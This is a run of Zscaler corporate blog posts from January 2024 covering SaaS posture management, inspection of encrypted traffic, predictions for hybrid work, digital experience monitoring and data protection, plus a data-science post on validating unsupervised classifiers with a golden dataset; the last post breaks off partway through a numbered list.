The ability to combine and analyze information from various security layers gives organizations a comprehensive understanding of their security posture and potential vulnerabilities. A Comprehensive, Unified Solution: Zscaler Data Protection brings together all the necessary components and functionality required for robust SaaS security. From access control and connectivity to SaaS and cloud integrations, our solution covers every aspect of securing your SaaS applications. Enhanced Data and Threat Security: With Zscaler, organizations can rest assured that their sensitive data is protected. Our platform offers robust data security measures to ensure sensitive information remains secure and compliant with industry regulations. Furthermore, our threat security functionality helps identify and mitigate potential threats, safeguarding your SaaS applications from malicious attacks. Contextual Understanding for Effective Security: The power of our Advanced SSPM lies in its ability to combine and analyze information from various security layers. By providing a comprehensive context, organizations can make informed decisions and implement security measures that address their specific needs and vulnerabilities. Zscaler Advanced SSPM for SaaS Security We have invested substantial efforts in developing and expanding our solutions to meet the evolving landscape of SaaS security. For instance, our acquisition of Canonic in 2023, now known as AppTotal, lets Zscaler better help your organization detect and secure risky third-party app integrations into SaaS. This functionality was highlighted in this year’s Forrester SSPM Wave. Our Advanced SSPM incorporates access control, connectivity, SaaS integrations, cloud integrations, and data and threat security functionalities. Our comprehensive approach ensures that organizations can leverage the full spectrum of security measures required for safeguarding their SaaS applications. Ready to secure your SaaS Platforms? 
Zscaler's Advanced SSPM stands out from the crowd due to its unique combination of components, capabilities, and reach. With a holistic approach encompassing access control, connectivity, SaaS integrations, cloud integrations, and robust data and threat security functionality, our solution empowers organizations to achieve unparalleled security for their SaaS applications. By leveraging the power of context, Zscaler's Advanced SSPM enables organizations to make informed decisions and implement effective security measures. Trust Zscaler to unlock the true potential of your SaaS security and elevate your organization's overall security posture. To learn more about Zscaler’s Advanced SSPM and Data Protection offering, visit our website, register for our webinar, or reach out to us for a demo. Wed, 17 Jan 2024 00:01:01 -0800 Salah Nassar 4 Ways Enterprises Can Stop Encrypted Cyber Threats Want to uncover the 86% of cyber threats lurking in the shadows? Join our January 18th live event with Zscaler CISO Deepen Desai to learn how enterprises can stop encrypted attacks, as well as explore key cyber threat trends from ThreatLabz. In today's digital world, we’ve come to trust HTTPS as the standard for encrypting and protecting data as it flows across the internet — the reassuring lock icon in the browser’s address bar assures us our data is safe. Organizations worldwide have rightfully recognized this protocol as an imperative for data security and digital privacy, and overall, 95% of internet-bound traffic is secured with HTTPS. But encryption is a double-edged sword. In the same way that encryption prevents cybercriminals from intercepting sensitive data, it also prevents enterprises from detecting cyber threats. As we revealed in our ThreatLabz 2023 State of Encrypted Attacks Report, more than 85% of cyber threats hide behind encrypted channels, including malware, data stealers, and phishing attacks. 
What’s more, many encrypted attacks use legitimate, trusted SaaS storage providers to host malicious payloads, making detection even more challenging. Encrypted channels are a major blind spot for any organization that is not performing SSL inspection today, enabling threat actors to launch hidden threats and exfiltrate sensitive data under cover of darkness. As threats advance and the number of malicious actors grows, these types of attacks continue to increase. ThreatLabz analyzed more than 29 billion blocked threats across the Zscaler Zero Trust Exchange from September 2022 to October 2023, finding a 24.3% increase year over year, with notable growth in phishing attacks and significant 297.1% and 290.5% growth for browser exploits and ad spyware sites, respectively. So, what can enterprises do to thwart encrypted attacks? The answer is simple: inspect all encrypted traffic. However, the reality of this task remains a huge challenge for most organizations. To fix the problem, we must first explore and understand why this is the case. A major enterprise blind spot: SSL/TLS Traffic As part of the 2023 State of Encrypted Attacks Report, ThreatLabz commissioned a separate third-party, vendor-neutral survey of security, networking, and IT practitioners to better understand their challenges, goals, and experience with encrypted attacks. We found that 62% of organizations have experienced an uptick in encrypted threats — with the majority having experienced an attack, and 82% of those witnessing attacks over “trusted” channels. However, enterprises face numerous challenges that prevent them from scanning 100% of SSL/TLS traffic at scale — the antidote to encrypted threats. The most popular tools for SSL/TLS scanning include a mix of network firewalls (62%) and application-layer firewalls (59%). 
These tools come with challenges at scale, the survey found; the top barriers preventing enterprises from scanning 100% of encrypted traffic today include performance issues and poor user experience (42%), cost concerns (32%), and scalability issues with the current setup (31%). Notably, a further barrier for 20% of respondents is that traffic from trusted sites and applications is “assumed safe” — which, our research shows, is not the case. These challenges stand in contrast with enterprise inspection plans. While 65% of enterprises plan to increase rates of SSL/TLS inspection in the next year, 65% are also concerned that their current SSL/TLS inspection tools are not scalable or future-proofed to address advanced cyber threats. This finding echoes enterprises’ confidence in their security setups: just 30% of enterprises are "very" or "extremely" confident in their ability to stop advanced or sophisticated cyber threats. These findings suggest that while enterprises are well aware of the risk of encrypted attacks, encrypted channels remain a prominent blind spot for many organizations — and many attacks can simply pass through without detection. Shining a light on cyber threats lurking in encrypted traffic Threat actors are exploiting encrypted channels across multiple stages of the attack chain: from gaining initial entry through tools like VPN to establishing footholds with phishing attacks, to delivering malware and ransomware payloads, to moving laterally through domain controllers, to exfiltrating data, oftentimes using trusted SaaS storage providers and more. Knowing this, enterprises should include mechanisms in their security plans to stop encrypted threats and prevent data loss at each stage of the attack chain. Here are four approaches that enterprises can adopt to prevent encrypted attacks and keep their data, customers, and employees secured. Figure 1: Stopping encrypted cyber threats across the attack chain 1. 
Inspect 100% of encrypted SSL/TLS traffic at scale with a zero trust, cloud-proxy architecture The key to an enterprise strategy to stop encrypted attacks starts with an ability to scan 100% of encrypted traffic and content at scale, with zero performance degradation — that’s step one. A zero trust architecture is an outstanding candidate for this task for a number of key reasons. Based on the principle of least privilege, this architecture brokers connections directly between users and applications — never the underlying network — based on identity, context, and business policies. Therefore, all encrypted traffic and content flows through this cloud-proxy architecture, with SSL/TLS inspection for every packet from every user on a per-user basis with infinite scale, regardless of how much bandwidth users consume. In addition to this, direct user-to-app and app-to-app connectivity make it substantially easier to segment application traffic to highly granular sets of users — eliminating lateral movement risk that is often the norm in traditional, flat networks. Meanwhile, a single policy set vastly simplifies the administrative process for enterprises. This is in contrast to application and network firewalls — themselves frequent targets of cyber attacks — which in practice translate to greater performance degradation, complexity, and cost at scale, while failing to achieve enterprise goals of 100% SSL/TLS inspection. In other words, stopping encrypted threats begins and ends with zero trust. 2. Minimize the enterprise attack surface All IP addresses, or internet-facing assets, are discoverable and vulnerable to threat actors — including enterprise applications and tools like VPNs and firewalls. Compromising these assets is the first step for cybercriminals to gain a foothold and move laterally across traditional networks to your valuable crown-jewel applications. 
Using a zero trust architecture, enterprises can hide these applications from the internet — placing them behind a cloud proxy so that they are only accessible to authenticated users who are authorized by business access policy. This simple fact empowers enterprises to immediately remove vast swaths of the external attack surface, prevent discovery by threat actors, and stop many encrypted attacks from ever happening in the first place. 3. Prevent initial compromise with inline threat prevention Enterprises have numerous tools at their disposal to stop encrypted threats, and here a layered defense is the best approach. Critically, these defenses should be inline — in the data path — so that security tools detect malicious payloads before delivery, rather than relying on the pass-through, out-of-band approaches of many traditional technologies. There are a number of core technologies that should make up a best-practice defense. These include an inline sandbox with ML capabilities: whereas many traditional sandboxes assume patient-zero risk, an ML-driven sandbox at cloud scale allows companies to quarantine, block, and detonate suspicious files and zero-day threats immediately, in real time, without impacting business. Furthermore, technologies like cloud IPS, URL filtering, DNS filtering, and browser isolation — turning risky web content into a safe stream of pixels — combine to deliver enterprises what we would term advanced threat protection. While encrypted threats can pass by unnoticed by many enterprises, this type of layered, inline defense ensures that they won’t. 4. Stop data loss Stopping encrypted attacks doesn’t end with threat prevention; enterprises must also secure their data in motion to prevent cybercriminals from exfiltrating it. As mentioned, threat actors frequently use legitimate, trusted SaaS storage providers — and therefore “trusted” encrypted channels — to host malicious payloads and exfiltrated data. 
Without scanning their outbound SSL/TLS traffic and content inline, enterprises have little way to know this is happening. As with threat prevention, enterprises should also take a multi-layered approach to securing their data. As best practices, enterprises should look for functionality like inline DLP, which inspects SSL/TLS content across all data channels, like SaaS apps, endpoints, email, private apps, and even cloud posture. As a note, in addition to exact data match (EDM), Zscaler has taken an AI-driven approach to automatically discover and classify data across the enterprise, and these categories are used to inform DLP policy. Finally, CASB provides another critical layer of security, protecting inline data in motion and out-of-band data at rest. Diving deeper into encrypted attacks Of course, these best practices are the tip of the iceberg when it comes to understanding and defending against the full range of encrypted attacks. For a deeper analysis of how enterprises can stop encrypted threats, as well as discover key trends in this dynamic landscape, be sure to register for our upcoming January 18th live webinar with CISO Deepen Desai. Moreover, to uncover our full findings, get your copy of the ThreatLabz 2023 State of Encrypted Attacks Report today. Fri, 12 Jan 2024 15:07:03 -0800 Will Seaton Hybrid Work and Zero Trust: Predictions for 2024 2023 was dubbed “the year of efficiency.” It saw many organizations work towards operational efficiencies in an effort to become nimbler. “More with less” was the mantra spoken by several C-level execs as they tightened their security posture while driving higher productivity. Moving into 2024, the proliferation of generative AI is expected to rapidly accelerate innovation, address inefficiencies, and boost productivity across the board. Such a focus on productivity has also kept the conversation around work-from-anywhere alive and well. 
From a productivity perspective, hybrid work continues to be the benchmark, allowing flexibility to hire talent from anywhere. Executives are finding the right balance between fully remote, in-office, and hybrid employees to maximize business efficiency. Irrespective of what every organization chooses to do going forward, finding the right balance between access and security is key for increasing and maintaining productivity. We at Zscaler have put together a list of the top predictions for 2024 when it comes to hybrid work trends: Return to office will peak Over the last few years, one question has echoed in everyone’s minds: What will the new workplace look like? 2023 saw many organizations test a hybrid work model, shifting away from a fully remote workforce. This trend is set to continue in 2024, with more and more companies fully embracing hybrid work, increasing the number of days to work from the office and collaborate. The KPMG CEO Outlook Survey found that 64% of leaders globally predict a full return to in-office work by 2026. Further research shows that in the US, 90% of companies intend to implement their return-to-office plans by the end of 2024, according to a report from Resume Builder. These trends will also see IT and security teams reaching for solutions that can support them while maintaining business growth. Third-party access requirements will grow With productivity and efficiency on the agenda for 2024, teams are extending their reach and skill sets beyond what’s available within the capacity of their full-time employees. Namely, they’re hiring contractors to aid them in creating positive business outcomes. To do so, they need to adapt to working with remote contractors and have the tools and infrastructure in place to successfully manage staff along with the right level of security. Last year, a LinkedIn study showed higher growth in contract workers compared to full-time employees. 
This trend will continue into 2024 as organizations brace themselves for sudden changes in the market as well as their own bottom lines. These third-party users—contractors, vendors, or suppliers—will demand better access to business applications in order to be impactful. This level of fast, easy access to work will drive third-party productivity. Cyberattack risk will increase With workforces and applications becoming more dispersed, the attack surface has increased as well. Of course, bad actors have jumped on the opportunity, increasing their overall cyberattack output, including the recent social engineering attack in the entertainment and gaming industry. What’s more, generative AI has seen widespread organizational adoption, which also means more potential threat vectors. Bad actors, for their part, are leveraging GenAI tools to discover vulnerabilities in critical sectors and add increased personalization to their attacks, resulting in a potential catastrophe for businesses of all industries through unwavering ransom demands. In addition, 2024 will see increased exploitation of legacy VPN and firewall infrastructure. The cost and complexity of maintaining physical devices that support VPNs, as well as patching their vulnerabilities, has left many IT teams in a rut of infrastructure maintenance rather than improvement. As such, IT teams are looking to amp up their security stack through the cloud to avoid and respond to threats. More mergers and acquisitions will take place Despite economic uncertainty and the current wave of geopolitical challenges, the outlook for M&A appears promising, per Nasdaq. The push to consolidate or divest in certain industries has driven M&A in the past year, and this momentum is expected to continue. Organizations will need to find ways to efficiently onboard new employees and give them application access to maximize productivity amid a merger or acquisition. 
Organizations that have implemented zero trust network access (ZTNA) have seen a 50% reduction in onboarding time for new employees. Additionally, they’re able to provide consistent access policies across both organizations without compromising security. VPNs will continue to lose fans Our 2023 VPN Risk Report found that nearly 1 in 2 organizations experienced a VPN-related attack. This has been a strong reason to move away from legacy remote access solutions in favor of something more robust that can scale with the organization’s growth. With 92% of organizations considering, planning, or in the midst of a zero trust implementation in 2023, this trend will continue well into 2024. Reliance on VPNs will be reduced, and ZTNA will continue to gain traction due to its faster time to value. Indeed, a Zscaler customer reported a sub-48-hour implementation of Zscaler Private Access, effectively replacing their VPNs for remote employees. Organizations will adopt zero trust to better mitigate cyberattacks A zero trust architecture challenges threats by ensuring granular access control and multilayered network segmentation, delivering the best protection of organizations’ most critical data and communications. ZTNA is a ransomware deterrent, hiding crown jewel applications from the internet and making them virtually impossible to attack. Gartner predicts that by 2025, at least 70% of new remote access deployments will be delivered predominantly via ZTNA as opposed to VPN services. Our 2023 VPN Risk Report suggests continued growth in risk awareness among IT and security leaders as they continue their due diligence on effective zero trust solutions to replace legacy technologies. Conclusion As workforces and applications become increasingly mobile, cloud security solutions offer the means of keeping them protected without harming user experience. 
Amid a dynamic, evolving threat landscape driven by artificial intelligence, the scale and agility offered through such solutions will help organizations better determine the right deployments for their needs. Learn more about how you can protect your private apps and secure your hybrid workforce by leveraging Zscaler Private Access. This blog is part of a series of blogs that provide forward-facing statements into access and security in 2024. The next blog in this series covers SASE predictions. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. 
These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Thu, 11 Jan 2024 08:00:01 -0800 Kanishka Pandit Digital Experience Monitoring Predictions for 2024 In 2023, we’ve seen an increase in companies focused on maximizing growth as it relates to productivity and innovation. Employers were looking to optimize employee experiences and reduce costs in hopes of driving increased revenues. According to Great Place To Work, 2023 revenue per employee for Fortune 100 Best Companies increased by 7% YoY, up from 4% in 2022. To ensure great employee productivity, companies need secure and fast application and data access from home, hotels, airports, and the office. This is confirmed by Hyatt’s recent earnings, which showed a 2x increase as travel surged compared to pandemic levels. These trends continue to push IT teams to support employees as they securely access SaaS, public, and private cloud applications (e.g., SAP, Microsoft Office 365, ServiceNow) from anywhere. 
Globally distributed enterprise is today’s reality. However, if organizations continue to leverage legacy network architectures that rely on VPNs and firewalls, they are more susceptible to attacks. These technologies expand an organization's attack surface as they place users directly on a routable network. In a recent VPN risk report, 45% of organizations confirmed experiencing at least one attack that exploited VPN vulnerabilities in the last year. Of those, one in three became victims of VPN-related ransomware attacks. Security does not have to be a tradeoff for fast and reliable access. In a recent post, we analyzed the last 12 months of conversations with hundreds of IT professionals about their employee experience, and they reported similar findings: they lack visibility into Wi-Fi and ISP networks. Their current tools struggle to consolidate device, network, and application details such as system processes, memory, CPU, network latencies, packet loss across network hops, and application response times (DNS, SSL handshake, HTTP/TCP connect). IT must secure and optimize experiences even when networks are out of their control. Businesses continue to rethink their digital transformation journey to ensure a flawless end user experience while securing users, workloads, and devices over any network, anywhere. As both travel and revenue per employee increase, employers are learning how to optimize costs and employee productivity across the board. As we kick off 2024, one thing is clear: understanding how employee experience can impact revenue as a driving force to increasing profits is key. To aid IT teams, organizations need a better path forward, one designed with security and an optimized end user experience, driven by actionable AI. 
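To illustrate the cross-layer correlation described above, here is a minimal sketch that maps one session's device, network, and application metrics to a likely bottleneck. The field names and thresholds are invented for illustration; real DEM tools baseline them from large volumes of telemetry rather than hard-coding them:

```python
# Illustrative thresholds only; a real digital experience monitoring tool
# would learn baselines per user, device, and location from telemetry.
def likely_bottleneck(sample: dict) -> str:
    # Correlate device, network, and application metrics collected for
    # one user session to suggest which layer is degrading experience.
    if sample["cpu_pct"] > 90 or sample["memory_pct"] > 95:
        return "device"
    if sample["packet_loss_pct"] > 2 or sample["hop_latency_ms"] > 150:
        return "network"
    if sample["ssl_handshake_ms"] + sample["tcp_connect_ms"] > 1000:
        return "application"
    return "none"

sample = {
    "cpu_pct": 35, "memory_pct": 60,                # device metrics
    "packet_loss_pct": 6.5, "hop_latency_ms": 40,   # last-mile network metrics
    "ssl_handshake_ms": 120, "tcp_connect_ms": 80,  # application metrics
}
print(likely_bottleneck(sample))  # network
```

The value of consolidation shows up even in this toy: only because all three metric families sit in one record can the high last-mile packet loss be blamed instead of the healthy application tier.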
As organizations look forward to 2024, three top digital experience monitoring trends emerge:
- Zero trust growth will require integrated digital experience monitoring (DEM)
- AIOps is a requirement, not a “nice to have,” to reduce mean time to resolution
- Reduce overall IT costs
Zero trust growth will require integrated DEM As organizations look to secure their environments leveraging zero trust architectures, they need an integrated digital experience monitoring solution to ensure flawless end user experience no matter where users are located. As we found in our customer conversations, many organizations fail to gain insights into zero trust environments with existing monitoring solutions. They also lack full end-to-end visibility, such as last-mile ISP and Wi-Fi insights. Adding to the complexity, managing and correlating data across multiple tools for device, network, and application is time-consuming and frustrating for the end user. Zero trust solutions must include DEM by simplifying deployment through a single agent that combines security and monitoring. Monitoring insights should include device metrics (CPU, memory, disk, network bandwidth), network metrics (hop-by-hop latencies, packet loss, jitter, MOS scores, DNS times), and application response times (TCP connect, SSL handshake, HTTP connect, TTFB, TTLB), with intuitive correlation to help service desk and network operations teams. AIOps is a requirement, not a “nice to have,” to reduce mean time to resolution (MTTR) As we’ve seen in 2023, generative AI has completely changed the industry, and we’ve seen new applications emerge that create data at exponential rates. We are only scratching the surface of the potential with these apps. Much of this data may not be seen by humans. However, insights from this data could be critical for organizations. Organizations may access thousands of SaaS-based applications to create solutions (e.g., images, text, code) to increase productivity. 
As these applications become critical for organizations, they must ensure their availability. For example, one manufacturing company shared with us how they leverage generative AI to decrease the time required to produce website content. They take hand-drawn images and upload them into a generative AI solution to create hundreds of images based on different scenarios. This typically took months, but it now takes minutes and frees up their team to think more strategically. However, to gain efficiency, IT must play many roles regarding the security and availability of these applications. Beyond the guardrails required, IT must ensure employees have access to the tools the business needs, which adds to the cost and complexity. Monitoring these new SaaS applications wherever the user connects will keep employees productive. As organizations look to increase employee productivity, security, network, and service desk teams must collaborate closely to ensure excellent end user experiences. Providing meaningful insights for all the IT teams requires relevant data. Zero trust monitoring solutions must have machine learning models based on years of data across millions of telemetry points to be effective. As data is collected, these models must adapt and learn based on end user feedback to efficiently identify the root cause of issues. There are three key areas IT teams need to consider: Proactively identify recurring issues before users are impacted. For example, if a certain Wi-Fi router shows repeated issues, network teams can work with service desk teams and end users to proactively replace Wi-Fi routers so end users continue to have great access. Empower service desk teams to either resolve issues or escalate with confidence. For example, if an end user complains about an SAP issue, the service desk team must know a potential root cause in seconds and route it to the appropriate L3 team. 
They will need an intuitive AI solution to identify the issue in seconds and share those insights. Drive increased monitoring intelligence with continuous updates to machine learning models. Zero trust monitoring solutions must expand monitoring vantage points and collect new insights to aid IT teams. Reduce overall IT costs As we’ve seen in 2023, macroeconomic pressures are forcing organizations to think about maximizing productivity and profits. In 2023, many organizations started their journey to zero trust solutions and are ready to embark on integrating their security and monitoring stacks. In 2024, we’ll see leaders at these organizations ask tough questions around monitoring zero trust environments without adding complexity to their IT architectures. This will set organizations apart, as those with the right zero trust architecture will have included monitoring as part of the journey. Not only will it provide better insights for network operations and service desk teams, it will lower overall IT costs. They will be able to retire siloed monitoring solutions to reduce costs and gain better insights. For example, if service desk, desktop, network, and application teams all leveraged the same monitoring solution, they could confidently provide IT leaders with key insights and remove finger-pointing, which still occurs because teams rarely look at the same datasets. IT leaders will want a consolidated monitoring stack to answer the following questions:
- What’s the root cause of Zoom, Teams, and Webex call quality issues, and how do I correlate it to the end user’s device, network, and application?
- We leverage VPNs for private applications and experience application slowness. How do I identify if it’s the device’s CPU or one of the hops in the network?
- My users blame security for application slowness. How can we quickly verify it’s not?
As we saw in 2023, organizations want to leverage existing IT investments where possible. 
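As a toy illustration of the first of the three areas above, proactively flagging recurring issues such as the Wi-Fi router example, the sketch below counts issue events per access point and flags repeat offenders for replacement. The event format and threshold are assumptions for illustration, not any product's actual schema:

```python
from collections import Counter

def routers_to_replace(events: list[tuple[str, str]], threshold: int = 3) -> set[str]:
    # events: (router_id, issue_type) records drawn from monitoring telemetry.
    # Flag routers whose issue count reaches the threshold so network teams
    # can replace them before more users are impacted.
    counts = Counter(router for router, _ in events)
    return {router for router, n in counts.items() if n >= threshold}

events = [
    ("wifi-ap-12", "high packet loss"),
    ("wifi-ap-12", "jitter spike"),
    ("wifi-ap-07", "high packet loss"),
    ("wifi-ap-12", "disconnects"),
]
print(routers_to_replace(events))  # {'wifi-ap-12'}
```

A production AIOps pipeline would obviously do more, weighting issue severity, windowing by time, and learning thresholds from feedback, but the shape is the same: aggregate telemetry per component, then surface the outliers before users open tickets.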
Apart from consolidating their monitoring silos, in 2024, organizations will want to leverage existing ticketing systems. To do so, zero trust monitoring solutions must take AI-powered insights and push them into the tools where service desk and network operations teams live. For example, many organizations have ServiceNow workflows, and smart integrations will provide IT teams with key insights to resolve issues in minutes. Summary As IT teams start planning for 2024, it's key to find digital experience monitoring solutions that effectively support the hybrid workforce, leverage AI assistance, and drive lower overall IT costs. As you embark on your 2024 initiatives, consider Zscaler's Digital Experience monitoring solution. But don't take our word for it. See what our customers are saying: “15 minutes to resolve user experience issues, down from 8 hours” Jeremy Bauer, Sr. Director Information Security, Molson Coors Beverage Company “Zscaler helps us identify the issues that need to be addressed before they cause disruption to AMN users, so we can ensure a seamless experience from anywhere.” Mani Masood, Head of Information Security, AMN Healthcare “When I open my computer, it doesn't matter if I'm in California, Arizona, Nevada, or across the globe, I get the same experience and the same level of protection.” David Petroski, Senior Infrastructure Architect, Southwest Gas Interested in learning more about ensuring great digital experiences in 2024? Click here for Zscaler’s perspectives. This blog is part of a series of blogs that look ahead to what 2024 will bring for key areas that organizations like yours will face. The next blog in this series covers hybrid work predictions for 2024. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management.
The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. 
Tue, 09 Jan 2024 08:00:01 -0800 Rohit Goyal Data validation on production for unsupervised classification tasks using a golden dataset Abstract Have you ever been working on an unsupervised task and wondered, “How do I validate my algorithm at scale?” In unsupervised learning, in contrast to supervised learning, our validation set has to be manually created and checked by us, i.e., we have to go through the classifications ourselves and measure the classification accuracy or some other score. The problem with manual classification is the time, effort, and work it requires, but this is the easy part of the problem. Let’s assume that we developed an algorithm and tested it very well while manually reviewing all the classifications. What about future changes to that algorithm? After every change, we would have to check the classifications manually again. And while the classified data might change with time, it might also grow to huge scales as our product evolves and our customer base grows, making the manual classification problem much more difficult. Have you started to worry about your production algorithms already? Well, you shouldn’t! After reading this, you will be familiar with our proposed method to validate your algorithm’s score easily, adaptively, and effectively against any change in the data or the model. So let's start detailing it from the beginning. Why is it needed? Continuous modifications to an algorithm always happen. For example:
Runtime optimizations
Model improvements
Bug fixes
Version upgrades
How do we deal with these modifications? We usually use QA tests to make sure the system keeps working. At the same time, the best among us might even develop regression tests to make sure, for several constant scenarios, that the classifications would not change. What about data integrity? But what about the real classifications on prod? Who verifies how they change?
We need to make sure that we won’t have any disasters on prod when deploying our new changes to the algorithm. For that, we have two possible solutions:
Naive solution - pass through all the classifications on prod (which is of course not possible)
Practical solution - use a sample of each customer’s data on prod, sized using the margin of error equation
Margin of error To demonstrate, we are going to take a constant sample from each customer’s data that represents the real distribution of the data with minimal deviation. We will size this sample using the margin of error equation, familiar from election surveys, which are often based on equations derived from it. So, how does it work? We can rearrange the equation for the margin of error to extract the required sample size. We would like a maximum margin of error of e = 5%, and we use the constant Z = 1.96 for a confidence level of 95% (use a different Z value for another confidence level). Solving for the sample size gives n = Z² · p(1 − p) / e², where p is the estimated proportion of the attribute of interest (p = 0.5 is the worst case). When we know the full data size N, we can be more precise by applying the finite population correction n′ = n / (1 + (n − 1)/N); otherwise, we are left with the uncorrected value, which is also fine. We can now freeze those samples, which we call a “golden dataset,” and use them as a supervised dataset for future modifications; it serves as a data integrity validator on real data from prod. We should mention that because prod data may change over time, we encourage you to update this golden dataset from time to time.
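The sample size calculation described above can be sketched in Python. This is a reconstruction of the idea rather than the original post’s code; the helper name and defaults are ours:

```python
import math

def required_sample_size(margin_of_error=0.05, z=1.96, p=0.5, population_size=None):
    """Sample size derived from the margin of error equation.

    p = 0.5 is the worst-case proportion; pass population_size to apply
    the finite population correction when the full data size is known.
    """
    n = (z ** 2) * p * (1 - p) / margin_of_error ** 2
    if population_size is not None:
        n = n / (1 + (n - 1) / population_size)
    return math.ceil(n)

# A 5% margin of error at 95% confidence needs 385 samples for a large dataset;
# the finite population correction shrinks that for smaller datasets.
print(required_sample_size())                      # 385
print(required_sample_size(population_size=1000))  # 278
```

Freezing this many samples per customer yields a golden dataset that tracks the real data distribution within the chosen margin of error.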
The flow of work for end-to-end data integrity:
Manual classification to create a golden dataset
Maintaining a constant baseline of prod classifications
Developing a suite of score comparison tests
Integrating the quality check into the algorithm’s CI process
So, how will it all work together? You can see that in the following GIF: We may now push any change to our algorithm code, and remain protected, thanks to our data integrity shield! For further questions about data integrity checks, or data science in general, don’t hesitate to reach out to me at [email protected]. Fri, 05 Jan 2024 14:41:10 -0800 Eden Meyuhas Data Protection Predictions for 2024 As IT teams reflect on 2023 and look forward to 2024, we can all agree that data is the lifeblood of an organization. To that end, every organization’s goal should be to have visibility and control of data, wherever it’s created, shared, and accessed. New cloud apps, GenAI, remote work, and advanced collaboration approaches are driving a greater need to centralize protection controls and analytics as well as increase efficiency. Without further ado, here are five predictions on how this will come together in 2024. 1. SaaS data gets a new protector While CASB has been a staple of SaaS data protection for quite some time, a new kid on the block is getting popular: SaaS security posture management (SSPM). SSPM comes at the problem of cloud data protection from a different angle. Where CASB focuses on securing collaboration risks attached to data (like sharing data with open links), SSPM focuses on securing the cloud itself. Shared responsibility models put the onus on your organization to ensure your SaaS apps have airtight configuration and integration posture. Since many of the largest breaches have stemmed from cloud misconfigurations, this is a growing concern. SSPM was built to address this very issue.
Via API and a shadow IT catalog, SSPM scans your SaaS apps and platforms (e.g., Microsoft 365, Google) and reveals misconfigurations or integrations that put you at risk of a breach. As SSPM begins to show up on radars worldwide, it’s important not to fall into point product land. Adding yet another point product to your environment is how many organizations end up with a Frankenstein security stack. As such, security service edge (SSE) becomes a logical final resting place for this core technology. Why? Complete SaaS security needs to be more than just controlling misconfigurations and integrations—you also need to think about SaaS identity (least-privileged access and permissions) and context visibility (who, what, where, and why). SSE excels in both these areas since it is becoming the de facto cloud security stack, which has all this information in spades. Additionally, SSE was built with extensibility for new features in mind. Pairing SSPM with the CASB, DLP, and data protection aspects of SSE delivers a fantastic platform from which to launch your SaaS security efforts. You get a unified approach to all four areas you need for airtight, holistic SaaS security: secure identity, secure data, shadow IT governance, and cloud posture. 2. Managed or unmanaged device? Who cares! In 2024, challenges with unmanaged (BYOD) endpoints used by your employees and partners will start to become a thing of the past. These cast-offs of the IT community have been a thorn in the side of security for some time since, to keep BYOD users productive, you still need to give them access to good stuff—like sensitive data. Since you don’t own or manage BYOD endpoints, you don’t have control over that data once it lands on the device. With managed devices, you have lots of control levers to keep data secure. You can ensure patch level and device posture are up to snuff, or even remotely wipe the machine if need be. Not so much with BYOD.
With newer approaches like browser isolation, handling BYOD becomes a snap. Just throw those devices into an isolated browser before you send them off to access all that sensitive data. This way, the data remains in the isolated browser and never lands on the unmanaged device. Data is streamed to the device and appears on the screen, but you can’t cut, paste, print, or download it. Look for vendors who can deliver this game-changing functionality without the need for a software agent, and with easy-to-configure BYOD portals that make getting app access as easy as logging in and clicking on the app of choice. 3. Secure the life cycle, not just the data Another approach to posture that is gaining traction is data security posture management. While SSPM focuses on SaaS apps, DSPM focuses on the life cycle of your data to ensure it always has the right security posture. It’s about who, what, where, and why, much like SSPM in our first prediction. However, in this case, the hero of the story is your data. Why are organizations focusing on this? Pick the most sensitive, crown-jewel piece of information in your organization. Naturally, you’d like to know where it is, where it moves to, who has access to it, if there are risky behaviors attached to it, and guidance on how to close those risks. In essence, you want to protect and follow that data anywhere. DSPM helps you do that, at scale, across all your sensitive data, with in-depth context to make the right protection decisions. The result is a consistent safe data posture that is inherently stronger and more airtight than before. Much like SSPM, look for DSPM to become a core part of SSE. Paired with other key data protection technologies like DLP, CASB, and centralized policy control, DSPM will be an invaluable addition to data protection programs that need to up their game around control of sensitive data. 4. 
